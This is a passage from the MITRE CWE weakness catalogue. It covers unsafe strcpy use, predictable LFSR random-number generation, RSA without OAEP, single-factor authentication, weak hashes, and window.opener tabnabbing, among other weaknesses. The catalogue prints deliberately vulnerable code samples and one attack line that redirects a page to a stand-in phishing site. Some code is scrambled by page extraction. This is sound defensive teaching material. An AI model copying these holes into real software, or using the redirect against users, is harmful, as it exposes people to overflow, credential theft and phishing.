relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-676: Use of Potentially Dangerous Function
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code attempts to create a local copy of a buffer to perform some manipulations to the data. (bad code)
Example Language: C
void manipulate_string(char * string){
char buf[24]; }strcpy(buf, string); ... However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely.
CWE-1241: Use of Predictable Algorithm in Random Number Generator
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterPseudo-random number generator algorithms are predictable because their registers have a finite number of possible states, which eventually lead to repeating patterns. As a result, pseudo-random number generators (PRNGs) can compromise their randomness or expose their internal state to various attacks, such as reverse engineering or tampering. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Suppose a cryptographic function expects random value to be supplied for the crypto algorithm. During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm. Example 2 The example code is taken from the PRNG inside the buggy OpenPiton SoC of HACK@DAC'21 [REF-1370]. The SoC implements a pseudo-random number generator using a Linear Feedback Shift Register (LFSR). An example of LFSR with the polynomial function P(x) = x6+x4+x3+1 is shown in the figure. (bad code)
Example Language: Verilog
reg in_sr, entropy16_valid;
reg [15:0] entropy16; assign entropy16_o = entropy16; assign entropy16_valid_o = entropy16_valid; always @ (*) begin
in_sr = ^ (poly_i [15:0] & entropy16 [15:0]);
endA LFSR's input bit is determined by the output of a linear function of two or more of its previous states. Therefore, given a long cycle, a LFSR-based PRNG will enter a repeating cycle, which is predictable. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-780: Use of RSA Algorithm without OAEP
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The example below attempts to build an RSA cipher. (bad code)
Example Language: Java
public Cipher getRSACipher() {
Cipher rsa = null; }try { rsa = javax.crypto.Cipher.getInstance("RSA/NONE/NoPadding"); }catch (java.security.NoSuchAlgorithmException e) { log("this should never happen", e); }catch (javax.crypto.NoSuchPaddingException e) { log("this should never happen", e); }return rsa; While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP. (good code)
Example Language: Java
public Cipher getRSACipher() {
Cipher rsa = null; }try { rsa = javax.crypto.Cipher.getInstance("RSA/ECB/OAEPWithMD5AndMGF1Padding"); }catch (java.security.NoSuchAlgorithmException e) { log("this should never happen", e); }catch (javax.crypto.NoSuchPaddingException e) { log("this should never happen", e); }return rsa;
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed.
CWE-308: Use of Single-factor Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In both of these examples, a user is logged in if their given password matches a stored password: (bad code)
Example Language: C
unsigned char *check_passwd(char *plaintext) {
ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); }//Login if hash matches stored hash if (equal(ctext, secret_password())) { login_user(); }(bad code)
Example Language: Java
String plainText = new String(plainTextIn);
MessageDigest encer = MessageDigest.getInstance("SHA"); encer.update(plainTextIn); byte[] digest = password.digest(); //Login if hash matches stored hash if (equal(digest,secret_password())) { login_user(); }This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
While the use of multiple authentication schemes is simply piling on more complexity on top of authentication, it is inestimably valuable to have such measures of redundancy. The use of weak, reused, and common passwords is rampant on the internet.
CWE-1104: Use of Unmaintained Third Party Components
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1391: Use of Weak Credentials
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker.
By design, authentication protocols try to ensure that attackers must perform brute force attacks if they do not know the credentials such as a key or password. However, when these credentials are easily predictable or even fixed (as with default or hard-coded passwords and keys), then the attacker can defeat the mechanism without relying on brute force. Credentials may be weak for different reasons, such as:
Even if a new, unique credential is intended to be generated for each product installation, if the generation is predictable, then that may also simplify guessing attacks. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple OT products used weak credentials. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-328: Use of Weak Hash
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).
A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold:
Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following:
What is regarded as "reasonable" varies by context and threat model, but in general, "reasonable" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world. Any algorithm that does not meet the above conditions will generally be considered weak for general use in hashing. In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a "rainbow table" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In both of these examples, a user is logged in if their given password matches a stored password: (bad code)
Example Language: C
unsigned char *check_passwd(char *plaintext) {
ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); }//Login if hash matches stored hash if (equal(ctext, secret_password())) { login_user(); }(bad code)
Example Language: Java
String plainText = new String(plainTextIn);
MessageDigest encer = MessageDigest.getInstance("SHA"); encer.update(plainTextIn); byte[] digest = password.digest(); //Login if hash matches stored hash if (equal(digest,secret_password())) { login_user(); }This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). Example 2 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. At least one OT product used weak hashes. Example 3 The example code below is taken from the JTAG access control mechanism of the Hack@DAC'21 buggy OpenPiton SoC [REF-1360]. Access to JTAG allows users to access sensitive information in the system. Hence, access to JTAG is controlled using cryptographic authentication of the users. In this example (see the vulnerable code source), the password checker uses HMAC-SHA256 for authentication. It takes a 512-bit secret message from the user, hashes it using HMAC, and compares its output with the expected output to determine the authenticity of the user. (bad code)
Example Language: Verilog
...
logic [31:0] data_d, data_q logic [512-1:0] pass_data; ...
Write: begin
...
...
end
if (pass_mode) begin
pass_data = { {60{8'h00}}, data_d};
...state_d = PassChk; pass_mode = 1'b0; The vulnerable code shows an incorrect implementation of the HMAC authentication where it only uses the least significant 32 bits of the secret message for the authentication (the remaining 480 bits are hard coded as zeros). As a result, the system is susceptible to brute-force attacks where the attacker only needs to determine 32 bits of the secret message instead of 512 bits, weakening the cryptographic protocol. To mitigate, remove the zero padding and use all 512 bits of the secret message for HMAC authentication [REF-1361]. (good code)
Example Language: Verilog
...
logic [512-1:0] data_d, data_q logic [512-1:0] pass_data; ...
Write: begin
...
...
end
if (pass_mode) begin
pass_data = data_d;
...state_d = PassChk; pass_mode = 1'b0; Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.
CWE-525: Use of Web Browser Cache Containing Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1022: Use of Web Link to Untrusted Target with window.opener Access
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.
When a user clicks a link to an external site ("target"), the target="_blank" attribute causes the target site's contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link. If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin. An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page's location in the browser. There are two ways that this weakness is commonly seen. The first is when the application generates an <a> tag is with target="_blank" to point to a target site: (bad code)
Example Language: HTML
<a href="http://attacker-site.example.com/useful-page.html" target="_blank">
If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link. However, the attacker could use scripting code to modify the window.opener's location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing: (attack code)
Example Language: JavaScript
window.opener.location = 'http://phishing.example.org/popular-bank-page';
To mitigate this type of weakness, some browsers support the "rel" attribute with a value of "noopener", which sets the window.opener object equal to null. Another option is to use the "rel" attribute with a value of "noreferrer", which in essence does the same thing. (good code)
Example Language: HTML
<a href="http://attacker-site.example.com/useful-page.html" target="_blank" rel="noopener noreferrer">
A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function. (bad code)
Example Language: JavaScript
var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank");
To mitigate this, set the window.opener object to null. (good code)
Example Language: JavaScript
var newWindow = window.open("http://attacker-site.example.com/useful-page.html", "_blank");
newWindow.opener = null; Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-451: User Interface (UI) Misrepresentation of Critical Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.
If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event. UI misrepresentation can take many forms:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant.
Maintenance
This entry should be broken down into more precise entries. See extended description.
CWE-293: Using Referer Field for Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
